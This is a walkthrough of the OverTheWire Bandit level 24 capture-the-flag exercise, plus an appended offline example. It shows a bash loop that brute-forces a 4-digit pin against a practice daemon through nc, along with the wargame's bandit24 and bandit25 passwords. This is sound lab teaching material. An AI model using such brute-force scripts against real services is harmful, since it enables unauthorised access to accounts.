Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

Walkthrough
So we need to write a script again to brute-force this. I only know a bit of bash, but this should be doable. Let's see which command we need to execute and how this works. Let's try the format: nc localhost port password pin
It asks for the pin after the connection. Okay. Let's try to echo the password and pin and pipe this into nc and see what it does. This works: we get a "please enter the correct pincode" message back. We can use this in our script, but we need a list of all the possible combinations.

So I googled how to make a for loop that generates the 4-digit pincodes and came up with this:

#!/bin/bash
# Password for bandit24, found in the previous level
password24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

# A zero-padded brace expansion (bash 4 or newer) yields 0000, 0001, ..., 9999.
# Each candidate goes on its own line in the format the daemon expects: "<password> <pin>".
# Redirecting once after the loop (instead of appending inside it) means a second run
# overwrites passlist.txt rather than doubling it.
for i in {0000..9999}
  do
    echo "$password24 $i"
  done > passlist.txt

This generated passlist.txt, with the password followed by each pin, starting at 0000:

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0001
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0002
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0003
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0004
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0005
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0006
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0007
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0008

So now the only thing I need to do is cat this file into nc and let it run? Let's try it.
cat passlist.txt | nc localhost 30002

This goes fast and it works! We got the password, but no idea which pincode was accepted: every wrong line just gets the "please enter the correct pincode" message back, and the one correct line gets the password. If you want the pin as well, number the daemon's output (grep -n, for instance), find the one line that is not that message, and look up the line with the same number in passlist.txt (adjusting for any lines the daemon prints before its first answer). But we got the password: uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
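As an added example, not from the walkthrough above, here is the same brute force written so it runs offline: the daemon on port 30002 is replaced by a shell function that answers one line per candidate (its exact wording and the secret pin 4242 are assumptions), and the script also recovers which pin succeeded by mapping the first non-"Wrong" reply back to the candidate on the same line number.

```shell
#!/bin/bash
# Added example (not from the walkthrough): the brute-force pipeline with an
# offline stand-in for the port-30002 daemon, so it runs without the Bandit host.
# It also recovers *which* pin succeeded, which `cat passlist.txt | nc` alone does not show.

PASSWORD24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ   # bandit24 password from the walkthrough
SECRET_PIN=4242                                # assumed secret; the real one is not known here
PASSWORD25=uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG    # what the real daemon returned in the walkthrough

# Emit "<password> 0000" .. "<password> 9999", one candidate per line.
# printf '%04d' does the zero padding, so this works in plain sh as well as bash.
gen_candidates() {
    pass=$1
    i=0
    while [ "$i" -le 9999 ]; do
        printf '%s %04d\n' "$pass" "$i"
        i=$((i + 1))
    done
}

# Stand-in for the daemon: one line in, one line out. Wrong guesses get the
# "please enter the correct pincode" message the walkthrough saw; the right one
# gets the password and the checker stops reading. (Assumed behaviour and wording;
# the real daemon may differ, e.g. by printing a banner before the first answer.)
fake_checker() {
    while IFS= read -r line; do
        if [ "$line" = "$PASSWORD24 $SECRET_PIN" ]; then
            printf 'Correct! The password of user bandit25 is %s\n' "$PASSWORD25"
            return 0
        fi
        printf 'Wrong! Please enter the correct pincode. Try again.\n'
    done
    return 1
}

# Push the whole candidate list through the checker in one stream (what
# `cat passlist.txt | nc localhost 30002` does) and map the first reply that is
# not "Wrong!" back to the candidate that produced it: reply n answers candidate n.
# Prints the pin on success; returns 1 if no candidate was accepted.
find_pin() {
    list=$(mktemp) || return 1
    gen_candidates "$PASSWORD24" > "$list"
    hit=$(fake_checker < "$list" | grep -n -v '^Wrong!' | head -n 1 | cut -d: -f1)
    if [ -z "$hit" ]; then
        rm -f "$list"
        return 1
    fi
    sed -n "${hit}p" "$list" | cut -d' ' -f2
    rm -f "$list"
}

find_pin
```

Against the real daemon, replace fake_checker with `nc localhost 30002` and subtract any header lines it prints before its first answer from the line number before looking it up in passlist.txt.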
